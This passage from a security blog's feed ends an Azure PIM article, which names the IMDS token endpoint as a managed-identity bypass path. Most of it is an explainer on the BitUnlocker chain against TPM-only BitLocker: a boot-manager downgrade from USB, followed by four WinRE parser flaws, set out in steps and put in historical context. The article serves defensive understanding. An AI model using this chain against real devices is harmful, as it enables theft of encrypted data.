&lt;p&gt;The forty years between Saltzer and Schroeder&apos;s 1975 paper and the 2015 Azure AD PIM Preview were not lost time. UNIX &lt;code&gt;sudo&lt;/code&gt;, Kerberos delegation, DACLs, AD groups, MIM PAM, Pass-the-Hash v1 and v2, the Securing Privileged Access roadmap -- each built up the structural understanding that least privilege required a temporal mechanism, not just a static one, and that the temporal mechanism had to live on the assignment object itself, not on the group, the credential, the session, or any indirection through a separate forest. The single new field on the role-assignment object is what those forty years were preparing.&lt;/p&gt;
&lt;p&gt;What remains undone is the application-identity boundary. The same role-assignment object Microsoft retrofitted to gate user activation does not yet gate the managed identity attached to a Function App. The IMDS endpoint at &lt;code&gt;169.254.169.254&lt;/code&gt; is the canonical 2026 bypass path that proves it. Closing that gap, when it comes, will not be a patch to the existing eligible/active state machine. It will be the next chapter -- the one where the state machine learns to apply to a principal that cannot perform an interactive MFA challenge, and the activation semantics are reinvented for the non-interactive case.&lt;/p&gt;
&lt;p&gt;The story is not finished. But the first chapter -- the chapter where standing admin became visibly the anti-pattern it had always been -- is.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;privileged-identity-management&quot; keyTerms={[
  { term: &quot;Standing admin&quot;, definition: &quot;A privileged identity whose role assignment is active and permanent. Standing admin is the deployed-reality default of any pre-PIM tenant and most AD-only environments through 2026.&quot; },
  { term: &quot;Eligible assignment&quot;, definition: &quot;A PIM-managed role assignment that grants no privilege until activated. Eligible is the standing relationship between principal and role; active is the time-bounded materialization.&quot; },
  { term: &quot;Active assignment&quot;, definition: &quot;A PIM-managed role assignment that grants the role&apos;s permissions for the assignment&apos;s duration. Active assignments are permanent (legacy posture) or time-bound (after activate()).&quot; },
  { term: &quot;Activation policy&quot;, definition: &quot;Per-role-per-scope configuration of activation gates: MFA, approval, justification, ticket number, and maximum duration. Gates are independent flags.&quot; },
  { term: &quot;Authentication context (PIM with Conditional Access)&quot;, definition: &quot;A label PIM attaches to the activation event so Conditional Access policies can target activation specifically, not just sign-in.&quot; },
  { term: &quot;Bastion forest&quot;, definition: &quot;A separate Active Directory forest dedicated to housing privileged accounts. The MIM 2016 PAM on-premises pattern; superseded for new deployments by cloud-first Entra PIM.&quot; },
  { term: &quot;Shadow principal&quot;, definition: &quot;An AD object (msDS-ShadowPrincipal, Windows Server 2016) carrying a production-forest SID that the bastion KDC injects into the user&apos;s Kerberos PAC for a TTL.&quot; },
  { term: &quot;Assignment-bypass alert&quot;, definition: &quot;The High-severity PIM Alert &apos;Roles are being assigned outside of Privileged Identity Management.&apos; Fires when a privileged role is assigned directly via Microsoft Graph rather than through PIM activation. Detective, not preventive.&quot; },
  { term: &quot;Enterprise Access Model (EAM)&quot;, definition: &quot;The post-2021 Microsoft reference architecture replacing Tier-0/1/2 with control plane, management plane, and data/workload plane.&quot; },
  { term: &quot;PIM for Groups&quot;, definition: &quot;The 2023 extension of PIM eligible/active assignment to security groups and Microsoft 365 groups. Gates both membership and ownership; excludes dynamic-membership groups and on-premises-synced groups.&quot; },
  { term: &quot;GDAP (Granular Delegated Admin Privileges)&quot;, definition: &quot;The May 2022 Microsoft Partner Center capability that replaces legacy DAP standing-Global-Administrator-on-every-customer-tenant with time-bound, role-scoped delegation between partner and customer tenants.&quot; },
  { term: &quot;Managed identity&quot;, definition: &quot;An Azure-managed service principal whose credentials are issued and rotated by Azure itself. Not currently in scope for PIM activation; role assignments are permanent and active.&quot; },
  { term: &quot;IMDS endpoint&quot;, definition: &quot;The Azure Instance Metadata Service endpoint at &lt;code&gt;http://169.254.169.254/metadata/identity/oauth2/token&lt;/code&gt;, reachable only from inside the Azure resource, that returns an OAuth token for the attached managed identity.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>privileged-identity-management</category><category>entra-id</category><category>just-in-time-admin</category><category>identity-security</category><category>azure</category><category>security-architecture</category><category>zero-trust</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>BitUnlocker: When Microsoft&apos;s Recovery Environment Becomes the Master Key</title><link>https://paragmali.com/blog/bitunlocker-when-microsofts-recovery-environment-becomes-the/</link><guid isPermaLink="true">https://paragmali.com/blog/bitunlocker-when-microsofts-recovery-environment-becomes-the/</guid><description>In July 2025, Microsoft&apos;s internal red team chained four CVEs in WinRE to bypass TPM-only BitLocker in under five minutes -- and the structural lesson is older than Windows 11.</description><pubDate>Sun, 24 May 2026 00:00:00 GMT</pubDate><content:encoded>
**In July 2025, Microsoft&apos;s own internal red team disclosed a four-CVE chain called BitUnlocker that bypasses TPM-only BitLocker in under five minutes from a USB stick, regardless of whether the device uses a discrete TPM, fTPM, or Pluton.** The attack works because the Windows Recovery Environment is given the BitLocker auto-unlock state legitimately during repair operations, and STORM found four parsers inside that trust boundary whose flaws let an attacker *be* the recovery environment. Patches shipped in KB5062553, but until the Secure Boot revocation infrastructure removes the pre-patch boot manager from the trust set, the chain remains exploitable on most fielded Windows 11 devices. The only mitigation that changes the threat model independently of patch state is the same recommendation Microsoft has been making since Vista: enable a pre-boot PIN.
&lt;h2&gt;1. Hold Shift, click Restart, lose your disk&lt;/h2&gt;
&lt;p&gt;Hold Shift. Click Restart. Plug in a USB stick carrying a pre-patch boot manager [@ms-winre-ref] [@garatc-poc]. Under five minutes later, on any device whose Secure Boot trust set still includes the 2011 root, the encrypted drive that protected your laptop is mounted in plaintext. No PIN ever entered. The &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt; none the wiser. The researchers who showed how to do this work at Microsoft.&lt;/p&gt;
&lt;p&gt;This is not a hypothetical. The proof of concept is on GitHub [@garatc-poc]. The end-to-end attack takes less than five minutes against a fully patched Windows 11 device that has not yet deployed the &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; revocation infrastructure -- which is to say, most of them.&lt;/p&gt;
&lt;p&gt;The attack is called BitUnlocker. It is a four-CVE chain disclosed and patched by Microsoft on July 8, 2025 in cumulative update KB5062553 [@kb5062553], then presented to the public a month later at Black Hat USA 2025 and DEF CON 33 with a Microsoft Security Blog write-up published August 13 to 14, 2025 [@ms-bitunlocker]. The four vulnerabilities are CVE-2025-48804 (System Deployment Image parsing) [@nvd-cve-2025-48804], CVE-2025-48800 (&lt;code&gt;tttracer.exe&lt;/code&gt; offline scanning) [@nvd-cve-2025-48800], CVE-2025-48003 (&lt;code&gt;SetupPlatform.exe&lt;/code&gt; and a Shift+F10 hotkey) [@nvd-cve-2025-48003], and CVE-2025-48818 (Boot Configuration Data target-OS impersonation) [@nvd-cve-2025-48818].&lt;/p&gt;
&lt;p&gt;The researchers are Netanel Ben Simon and Alon Leviev of STORM, Microsoft&apos;s internal red team [@itnews-bitunlocker]. Leviev is the same researcher who disclosed &lt;a href=&quot;https://paragmali.com/blog/windows-downdate-when-the-update-itself-is-the-attack/&quot; rel=&quot;noopener&quot;&gt;Windows Downdate&lt;/a&gt; at Black Hat USA 2024 [@safebreach-downdate], so the line of work has provenance: a Microsoft engineer who understands the Windows update pipeline well enough to undo it, now turned on the recovery pipeline that runs when the update pipeline fails.&lt;/p&gt;
&lt;p&gt;A five-minute physical bypass against BitLocker is not a research curiosity in 2026. ShrinkLocker, the BitLocker-as-ransomware-payload family disclosed by Kaspersky in May 2024, was used to extort organisations in Mexico, Indonesia, and Jordan [@kaspersky-shrinklocker]. APT41 paired ProxyLogon access with BitLocker as the workstation-encryption layer of a 2021 ransomware operation [@cymulate-apt41]. Romania&apos;s national water authority lost about 1,000 systems to a BitLocker-based ransomware incident over a December 2025 weekend [@therecord-romania-water]. BitLocker&apos;s installed base is where the defensive stakes live. BitUnlocker is what the offensive stakes look like.&lt;/p&gt;
&lt;p&gt;STORM stands for &lt;em&gt;Security Testing and Offensive Research at Microsoft&lt;/em&gt; [@itnews-bitunlocker]. It is the internal red team that publishes coordinated disclosures against Microsoft&apos;s own products.&lt;/p&gt;

The default BitLocker configuration on Windows 11 consumer and most enterprise installs. The Trusted Platform Module releases the Volume Master Key automatically at boot when the Platform Configuration Registers match an expected profile, with no human interaction. There is no pre-boot PIN, no startup key, no challenge -- the only authentication is the boot chain&apos;s measurement.
&lt;p&gt;The pre-boot PIN configuration -- TPM+PIN, in Microsoft&apos;s terminology -- defeats every attack in this article, including BitUnlocker. Microsoft has been recommending TPM+PIN in some form since BitLocker shipped with Windows Vista on its January 30, 2007 consumer general-availability date [@ms-bitlocker-countermeasures] [@ms-vista-launch]. Eighteen years later, that recommendation has not changed.&lt;/p&gt;
&lt;p&gt;What has changed is the consequence of ignoring it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; TPM-only BitLocker assumes the boot chain is trustworthy. The boot chain has been the dominant BitLocker attack surface for three years and counting. The Windows Recovery Environment is part of the boot chain.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The July 8, 2025 patches close the four code paths inside WinRE. They do not, by themselves, revoke the pre-patch boot manager that BitUnlocker downgrades to. Until the Secure Boot revocation under KB5025885 (the &quot;REVISE&quot; rollout) is deployed on a device, the BitUnlocker entry vector remains usable [@neodyme-bitpixie-no-fix] [@kb5025885].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To understand why a four-CVE chain inside the recovery environment is enough to mount the entire encrypted volume in plaintext, we have to go back to a design decision Microsoft made in 2006. That decision is still shipping in every copy of Windows.&lt;/p&gt;
&lt;h2&gt;2. Why the recovery environment has the keys&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; shipped with Windows Vista on its consumer general-availability date, January 30, 2007 [@ms-bitlocker-countermeasures] [@ms-vista-launch]. Niels Ferguson&apos;s August 2006 cipher specification described the cryptographic core -- AES in CBC mode plus a custom diffuser called Elephant, designed to resist exactly the kind of disk-sector chosen-plaintext games that an attacker with full-disk read/write access could otherwise play [@ms-ferguson-cipher] [@archive-ferguson]. Four protector modes shipped with Vista: TPM-only, TPM+PIN, TPM plus a USB startup key, and TPM plus startup key plus PIN [@ms-bitlocker-countermeasures]. Each successive mode added a pre-boot human-presence check that the TPM-only default deliberately omitted.&lt;/p&gt;
&lt;p&gt;The cipher specification is the public part of the design. The part that mattered for the rest of the story is the part that is barely documented at all: how recovery works.&lt;/p&gt;

The key-encrypting key that wraps the Full Volume Encryption Key. When a user changes their password or recovery configuration, only the VMK wrapping changes -- the entire volume does not need re-encryption. The TPM seals the VMK to a profile of boot-time measurements.

The symmetric key that encrypts each sector of the BitLocker-protected volume. The FVEK is never directly handled by the user; it sits behind the VMK and is rewrapped only during operations like algorithm change or full re-encryption.

A small bootable image, based on Windows PE, that the boot manager hands off to when normal Windows fails. WinRE provides Push Button Reset, Startup Repair, System Image Recovery, Reset This PC, and the offline scanning tools that the rest of this article will treat as a trust boundary [@ms-winre-ref].
&lt;p&gt;The recovery problem Microsoft was solving in 2006 was unromantic but unavoidable. If full-disk encryption is to be default-on for an operating system that ships on a billion devices, the recovery environment has to read the OS volume during a repair pass without re-prompting the user for a recovery key every time a Windows update hiccups. The 24x7 help desk for a Fortune 500 cannot dispatch a forty-eight-character recovery key to every user whose system needs Startup Repair. So the Windows boot manager passes the unlock state along to &lt;a href=&quot;https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/&quot; rel=&quot;noopener&quot;&gt;WinRE&lt;/a&gt;, which inherits the ability to mount the encrypted volume during legitimate recovery operations [@ms-winre-ref].&lt;/p&gt;
&lt;p&gt;The behavior is documented in every WinRE technical reference Microsoft has shipped since Vista. The &lt;em&gt;rationale&lt;/em&gt; -- the original engineering memo about why auto-unlock is the right answer, given the help-desk requirement -- is not public. That gap matters because the rationale is the load-bearing wall of the threat model. The choice is consistent with every Microsoft document about WinRE; the engineering decision itself is folk knowledge.&lt;/p&gt;

The trade-off that runs through this entire article is simple to state. If the recovery environment can mount the volume without user input, the recovery environment is part of the encryption&apos;s trust boundary. If the recovery environment requires user authentication on every entry, you have effectively re-implemented the pre-boot PIN -- you have just moved its name. Microsoft picked the first option in 2006 because the second option breaks help-desk recoverability. Eighteen years later, that is still the choice. BitUnlocker is what the bill looks like.
&lt;p&gt;Windows 8 removed the Elephant diffuser but kept AES-CBC alone. XTS-AES did not become BitLocker&apos;s default for new fixed drives until Windows 10 v1511 in November 2015 [@ms-bitlocker-configure]. The two-key VMK/FVEK hierarchy survived every cipher transition. So did WinRE&apos;s auto-unlock behavior.&lt;/p&gt;
&lt;p&gt;Twenty months after Vista shipped, a Princeton research group would discover that &quot;powered off&quot; did not actually mean &quot;key gone.&quot; The published attack literature against BitLocker was about to begin.&lt;/p&gt;
&lt;h2&gt;3. Eighteen years, six generations, one recommendation&lt;/h2&gt;
&lt;p&gt;The first attack specifically demonstrated against BitLocker as the named target appeared in 2008, the year after Vista&apos;s general availability -- though earlier generic memory primitives like FireWire DMA (Ruxcon 2006) became applicable to BitLocker as soon as Vista shipped. The most recent pre-2022 BitLocker bypass appeared in February 2024, when a four-dollar microcontroller pulled the keys off a Lenovo ThinkPad in 43 seconds [@hackaday-pico]. Between those two endpoints sit six attack generations. Each one moved one layer up the trust stack. Each one was answered by Microsoft with the same operational recommendation.&lt;/p&gt;

gantt
    title BitLocker bypass generations, 2006-2025
    dateFormat YYYY-MM
    axisFormat %Y&lt;pre&gt;&lt;code&gt;section Hardware-adjacent
Cold boot (Halderman et al)        :2008-07, 60d
FireWire/PCI DMA (Boileau, Inception) :2006-10, 1825d
TPM bus sniff (marcan, Andzakovic)   :2019-01, 365d
Pi Pico TPM sniff (StackSmashing)    :2024-02, 30d
TPM+PIN bus bypass (SCRT, Compass)   :2024-02, 270d

section Software boot chain
Stoned, Vbootkit 2                   :2009-07, 90d
Self-Encrypting Deception (Meijer)   :2018-11, 180d
Bitpixie discovery (Rairii)          :2022-08, 30d
Bitpixie disclosure (CVE-2023-21563) :2023-02, 30d
BlackLotus (CVE-2022-21894)          :2023-03, 90d
BitUnlocker (KB5062553)              :2025-07, 60d

section Paradigms
Evil Maid framing (Rutkowska)        :2009-10, 30d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The structural reading of that timeline matters more than any individual entry, so here is the layer-by-layer walk:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 1 -- Cold boot (2008).&lt;/strong&gt; J. Alex Halderman and collaborators at Princeton and the EFF showed that DRAM retains its contents for seconds to minutes after power loss, longer if chilled with canned air. The AES key schedule has enough redundancy to be reconstructed from a partial dump, which means a powered-off BitLocker laptop with a still-warm DIMM is not actually at rest [@halderman-coldboot] [@halderman-coldboot-pdf]. Microsoft&apos;s structural answer was the Memory Overwrite Request (MOR) bit [@ms-bitlocker-countermeasures] and the eventual move to DDR generations that lose state faster. The user-facing answer was a pre-boot PIN [@ms-bitlocker-countermeasures].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 -- FireWire and PCI DMA (2006 onward).&lt;/strong&gt; Adam Boileau demonstrated at Ruxcon 2006 -- in a talk titled &lt;em&gt;Hit By A Bus: Physical Access Attacks With Firewire&lt;/em&gt; -- that any host with an active FireWire port would let an unauthenticated peripheral read or write physical memory without involving the CPU [@boileau-ruxcon-2006]. Carsten Maartmann-Moe productionised the primitive as Inception, extending it to Thunderbolt, ExpressCard, and any other PCI-bus port that did not gate DMA behind the IOMMU [@inception-readme]. Microsoft&apos;s structural answer accumulated in stages: DMA-related Group Policy controls during the Windows 8.1 era, then a named Kernel DMA Protection feature shipped with Windows 10 1803 -- with the explicit exclusion that 1394 FireWire is not covered by KDP, so the legacy bus has to be disabled in firmware [@ms-kdp]. The user-facing answer was a pre-boot PIN.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 -- Classical bootkits (2009).&lt;/strong&gt; Peter Kleissner&apos;s Stoned and the Kumar brothers&apos; Vbootkit 2, both presented at Black Hat USA 2009, showed that a Master Boot Record bootkit could load above the BitLocker pre-boot environment, hook the key-release path, and never trip the TPM&apos;s Platform Configuration Registers because nothing had measured the MBR yet [@wack0-taxonomy]. Microsoft&apos;s structural answer was UEFI Secure Boot plus &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;Measured Boot&lt;/a&gt;&apos;s PCR 7, which moved the trust anchor from the MBR into the firmware. The user-facing answer was a pre-boot PIN.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Threat-model rename -- Evil Maid (2009).&lt;/strong&gt; Joanna Rutkowska and Alex Tereshkin published a one-minute USB-stick infector against TrueCrypt that established a threat-model name rather than a primitive [@rutkowska-evilmaid]. Rutkowska&apos;s earlier January 2009 post had already named BitLocker as the disk encryption she missed after moving to macOS [@rutkowska-miss-bitlocker]; her October 2009 follow-up named the category of attacks that everybody now calls Evil Maid. The Microsoft Countermeasures page now uses the same threat-model tier she articulated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 4 -- Self-Encrypting Deception (2018-2019).&lt;/strong&gt; Carlo Meijer and Bernard van Gastel showed at IEEE S&amp;amp;P 2019 that BitLocker had been silently delegating cryptography to the SSD firmware on self-encrypting drives -- and that the firmware was broken across several major vendor families, with Samsung 840/850 EVO and Samsung T3/T5 among the affected lines [@meijer-sed] [@researchr-meijer]. Microsoft&apos;s structural answer (KB4516071) was to stop delegating. This is the rare frontier Microsoft &lt;em&gt;closed&lt;/em&gt; rather than mitigated incrementally: software encryption became the default again, and the &quot;trust the drive&quot; path was retired.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5 -- TPM bus sniffing (2019-2024).&lt;/strong&gt; On a discrete TPM, the LPC or SPI bus between the CPU and the TPM chip carries the unsealed VMK in cleartext for a few microseconds. Hector Martin (marcan) first demonstrated extraction in January 2019 [@syss-tpm-sniffer]; Denis Andzakovic published the first written technical account later in 2019 [@andzakovic-tpmsniff] [@zdnet-bitlocker-attack] [@wack0-taxonomy]. StackSmashing&apos;s February 2024 Raspberry Pi Pico kit reproduced the same primitive against a Lenovo ThinkPad X1 Carbon for under ten dollars of hardware in 43 seconds of wall clock [@hackaday-pico] [@stacksmashing-pico]. Microsoft&apos;s structural answer was firmware TPM (AMD fTPM, Intel PTT) on modern CPUs and &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt; on Pluton-equipped chipsets [@ms-pluton]. The user-facing answer was a pre-boot PIN.&lt;/p&gt;
&lt;p&gt;The Pi Pico reproduction reduced the hardware cost by an order of magnitude from Andzakovic&apos;s 2019 FPGA setup [@andzakovic-tpmsniff] [@hackaday-pico]. Same primitive; different price point.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 5.5 -- TPM+PIN hardware bypass (2024).&lt;/strong&gt; SCRT in Switzerland and Compass Security independently published that even with TPM+PIN configured, the Intermediate Key released after PIN validation still traverses the bus in clear on discrete-TPM hardware [@scrt-tpm-pin] [@compass-2024]. The structural defeat is Pluton, where the bus does not exist on-die [@ms-pluton]. The user-facing answer for everyone else stayed: a pre-boot PIN, plus discrete-TPM replacement or BIOS-level TPM bus protection.&lt;/p&gt;

By default, Microsoft BitLocker protected OS drives can be accessed by sniffing the LPC bus, retrieving the volume master key when it&apos;s returned by the TPM, and using the retrieved VMK to decrypt the protected drive. -- Denis Andzakovic, Pulse Security, 2019 [@andzakovic-tpmsniff]
&lt;p&gt;Six generations. One recommendation. Pre-boot PIN. Microsoft has shipped real structural mitigations -- MOR, IOMMU, Secure Boot, Measured Boot, fTPM, Pluton, dbx revocation -- but the user-facing recommendation has not changed for eighteen years.&lt;/p&gt;
&lt;p&gt;All six generations attack the layer below the boot manager. The boot manager itself, signed by Microsoft, has been treated as the trust anchor. In 2022, the first attack to make the boot manager itself the surface arrived. Its name was Bitpixie, and it is BitUnlocker&apos;s immediate ancestor.&lt;/p&gt;
&lt;h2&gt;4. The boot manager itself becomes the surface (2022-2025)&lt;/h2&gt;
&lt;p&gt;In August 2022, an independent researcher posting under the handle Rairii discovered that the Microsoft-signed Windows boot manager itself had a logic flaw: under a specific PXE soft-reboot sequence, the BitLocker Volume Master Key remained in physical memory and was never zeroed when control transferred [@rairii-mastodon] [@martanne-bitpixie]. The bug was assigned CVE-2023-21563. The patch shipped in the January 10, 2023 Patch Tuesday cumulative [@nvd-cve-2023-21563] [@msrc-cve-2023-21563]; Rairii made the discovery public on Mastodon the following month [@rairii-mastodon]. The old signed binary remained chain-loadable. It still is.&lt;/p&gt;
&lt;p&gt;Thomas Lambertz of Neodyme published the canonical technical write-up of &quot;Bitpixie&quot; in late 2024, then presented the work at 38C3 in December 2024 [@neodyme-bitpixie] [@38c3-bitpixie]. His follow-up post asked an uncomfortable question -- &lt;em&gt;why no fix?&lt;/em&gt; -- and answered it: the patch closed the code path, but the pre-patch boot manager was signed under Microsoft&apos;s Windows Production CA 2011, and that certificate was still in the Secure Boot allow-list (&lt;code&gt;db&lt;/code&gt;) on most fielded Windows devices [@neodyme-bitpixie-no-fix]. A physically present attacker could supply an old, signed, vulnerable copy of &lt;code&gt;bootmgfw.efi&lt;/code&gt; and the firmware would still load it.&lt;/p&gt;

This article uses &quot;REVISE&quot; as a convenience handle for Microsoft&apos;s verbosely-named &quot;Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932&quot; rollout. Microsoft does not market the work under the REVISE name -- the technical content here is what matters. The UEFI `db` is the allow-list of trusted signing certificates and signed binary hashes; the `dbx` is the corresponding deny-list. KB5025885&apos;s current (April 2024+) approach is certificate-based: it adds the Windows Production PCA 2011 signing certificate to `dbx`, which untrusts every boot manager signed by it, and ships a new UEFI CA 2023 certificate to replace the 2011 root. (The original May 2023 mitigations used a hash-by-hash strategy against specific boot manager binaries that was superseded for being too narrow.) The rollout is opt-in across multiple phases (currently five) because pushing a `dbx` change at scale can brick devices [@kb5025885].

Microsoft Windows Production CA 2011. The intermediate certificate that signs the Windows boot manager and every other Microsoft-trusted EFI binary loaded under Secure Boot. The 2011 root is set to expire in waves starting June 2026, which is the structural reason REVISE / UEFI CA 2023 must complete before then [@kb5062553].
&lt;p&gt;The REVISE rollout under KB5025885 ships across opt-in phases (currently five: Initial Deployment, Second Deployment, Evaluation, Deployment, Enforcement), each gated by a registry-bitmask &lt;code&gt;AvailableUpdates&lt;/code&gt; opt-in.Within the currently-active Evaluation and Deployment phases, the mitigations roll out in three actions: (1) install the new UEFI CA 2023 cert into &lt;code&gt;db&lt;/code&gt; and trust-roll to the 2023-signed boot manager; (2) push the Windows Production PCA 2011 signing certificate into &lt;code&gt;dbx&lt;/code&gt; -- the moment that &quot;patched&quot; becomes &quot;revoked&quot; on that device; (3) write a Secure Version Number into the firmware so the boot manager can self-revoke older copies of itself [@kb5025885]. The named Phase 1 (Initial Deployment, May 9, 2023) used a now-superseded hash-by-hash revocation approach against specific boot manager binaries. Each phase is an irreversible state change once Secure Boot stays on, which is why Microsoft has gated the schedule on operator readiness rather than calendar pressure.&lt;/p&gt;
&lt;p&gt;Compass Security&apos;s May 2025 follow-up reproduced the Bitpixie exploit in a WinPE-based variant signed entirely by Microsoft components -- replacing the third-party Linux shim that secured-core PCs disable by default -- end-to-end in roughly five minutes via PXE [@compass-bitpixie-winpe]. Five minutes is a useful benchmark because BitUnlocker&apos;s USB-deliverable PoC clocks at the same number against the same chain-load downgrade primitive, with a different post-exploitation strategy and a different delivery vector.&lt;/p&gt;
&lt;p&gt;Two other 2022-2024 bootkits frame the era. ESET disclosed BlackLotus in March 2023, the first in-the-wild UEFI bootkit observed bypassing Secure Boot on a fully patched Windows 11 by abusing CVE-2022-21894 &quot;Baton Drop&quot; [@eset-blacklotus] [@msrc-cve-2022-21894]. ESET&apos;s November 2024 Bootkitty disclosure brought the first publicly analysed UEFI bootkit aimed at Linux, although ESET&apos;s follow-up note clarified the artefact was a Korean Best of Best student project rather than in-the-wild malware [@eset-bootkitty]. Both used the same observation that underwrites Bitpixie and BitUnlocker: a Microsoft-signed binary with a logic flaw stays trusted until Microsoft adds it to &lt;code&gt;dbx&lt;/code&gt;, which is a multi-year programme.&lt;/p&gt;

flowchart TD
    A[&quot;Microsoft-signed binary&lt;br /&gt;with a logic flaw&quot;] --&amp;gt; B[&quot;Stays trusted&lt;br /&gt;until dbx revokes its cert&lt;br /&gt;or its hash&quot;]
    B --&amp;gt; C1[&quot;Bitpixie (CVE-2023-21563)&lt;br /&gt;PXE soft-reboot leaks VMK&lt;br /&gt;from physical memory&quot;]
    B --&amp;gt; C2[&quot;BlackLotus (CVE-2022-21894)&lt;br /&gt;Baton Drop drops a&lt;br /&gt;UEFI bootkit&quot;]
    B --&amp;gt; C3[&quot;BitUnlocker (4 CVEs)&lt;br /&gt;Downgrade boot manager,&lt;br /&gt;be the recovery environment&quot;]
    C1 --&amp;gt; D[&quot;Patched is not revoked&quot;]
    C2 --&amp;gt; D
    C3 --&amp;gt; D
    D --&amp;gt; E[&quot;REVISE / UEFI CA 2023&lt;br /&gt;is the structural fix&quot;]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Each of Bitpixie, BlackLotus, and BitUnlocker depends on the same lemma. Microsoft can ship a patch that fixes a Microsoft-signed binary. Until that binary&apos;s signing certificate lands in &lt;code&gt;dbx&lt;/code&gt;, the old signed copy keeps working on every Windows device whose Secure Boot policy still trusts PCA 2011 -- which, in mid-2026, is most of them. The dbx update is a separate, opt-in, multi-phase operation that has to complete before June 2026 because that is when PCA 2011 starts to expire on its own terms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Same researcher, two pipelines: Leviev disclosed Windows Downdate at Black Hat USA 2024 and co-disclosed BitUnlocker at Black Hat USA 2025 [@safebreach-downdate]. Update pipeline one year, recovery pipeline the next.&lt;/p&gt;
&lt;p&gt;Bitpixie scavenges the VMK from RAM after a buggy soft reboot. BlackLotus drops a UEFI bootkit. Both depend on the same observation: a Microsoft-signed binary with a logic flaw stays trusted until Microsoft revokes it. In July 2025, four Microsoft engineers asked a sharper question. What if you do not have to find a logic flaw at all? What if the recovery environment is &lt;em&gt;given&lt;/em&gt; the keys legitimately, and all you have to do is &lt;em&gt;be&lt;/em&gt; the recovery environment?&lt;/p&gt;
&lt;h2&gt;5. Four parsers, one trust boundary&lt;/h2&gt;
&lt;p&gt;WinRE already has the keys. That is the design.&lt;/p&gt;
&lt;p&gt;STORM&apos;s insight was not to attack the seal. It was to observe that every parser inside WinRE sits inside the BitLocker auto-unlock trust boundary, and to ask which of those parsers is buggy. Once you reframe the problem from &quot;find a way to make the TPM release the key&quot; to &quot;the recovery environment is given the key by design, so make me the recovery environment,&quot; the question stops being cryptographic and becomes a code-audit question. STORM found four answers. There are almost certainly more.&lt;/p&gt;
&lt;p&gt;The four CVEs map to four parsers. The first is the entry vector; the next two are escalations inside the boundary; the fourth is the unconditional decryption finisher that turns the chain from a privileged shell into a permanently disabled BitLocker volume. Each subsection below follows the same template: what gets parsed, where the integrity check goes wrong, what falls out of the parser, why that primitive ends the chain.&lt;/p&gt;

sequenceDiagram
    participant U as Attacker (USB)
    participant FW as UEFI firmware
    participant BM as Pre-patch bootmgfw.efi (PCA 2011)
    participant SDI as Boot.sdi parser
    participant WRE as Malicious WinRE
    participant V as BitLocker volume
    U-&amp;gt;&amp;gt;FW: Boot USB stick
    FW-&amp;gt;&amp;gt;BM: Loads Microsoft-signed boot manager (downgraded)
    BM-&amp;gt;&amp;gt;SDI: Hash-and-execute SDI image
    SDI--&amp;gt;&amp;gt;SDI: Hash covers original bytes
    SDI--&amp;gt;&amp;gt;SDI: Execution targets appended WIM
    SDI-&amp;gt;&amp;gt;WRE: Hands control to malicious WinRE
    WRE-&amp;gt;&amp;gt;V: Inherits auto-unlock from boot context
    WRE-&amp;gt;&amp;gt;U: Shell on the cleartext volume
&lt;h3&gt;5.1 CVE-2025-48804 -- SDI parsing as the entry vector&lt;/h3&gt;
&lt;p&gt;WinRE boots from a System Deployment Image (&lt;code&gt;Boot.sdi&lt;/code&gt;) bundled with a Windows Imaging file (&lt;code&gt;.wim&lt;/code&gt;). The boot manager hashes the SDI for integrity before transferring control. STORM noticed that the integrity check covered the on-disk &lt;em&gt;original&lt;/em&gt; bytes of the SDI, but the runtime that consumed the image followed an internal offset pointer that the attacker could shift to point at &lt;em&gt;appended&lt;/em&gt; bytes after the hashed region [@nvd-cve-2025-48804] [@itnews-bitunlocker]. Append a malicious WIM at the tail of a legitimate SDI, manipulate the offset, and the hash still passes -- but execution targets your bytes.&lt;/p&gt;
&lt;p&gt;The garatc proof of concept assembles this into a USB-bootable payload that downgrades to a pre-patch &lt;code&gt;bootmgfw.efi&lt;/code&gt; signed under PCA 2011 (still trusted on most fielded devices), then parses an SDI of its own construction. Total prerequisites listed in the PoC README: physical access, TPM-only protector, PCR 7 plus PCR 11 trusted, and Microsoft Windows PCA 2011 in the Secure Boot &lt;code&gt;db&lt;/code&gt; [@garatc-poc]. The wall clock for end-to-end exploitation: under five minutes.&lt;/p&gt;
&lt;p&gt;{`
// Schematic of the CVE-2025-48804 integrity-vs-execution split.
// The hash covers the on-disk SDI bytes; execution follows an
// offset pointer that the attacker can move past the hashed region.&lt;/p&gt;
&lt;p&gt;const sdi = readFromDisk(&quot;Boot.sdi&quot;);
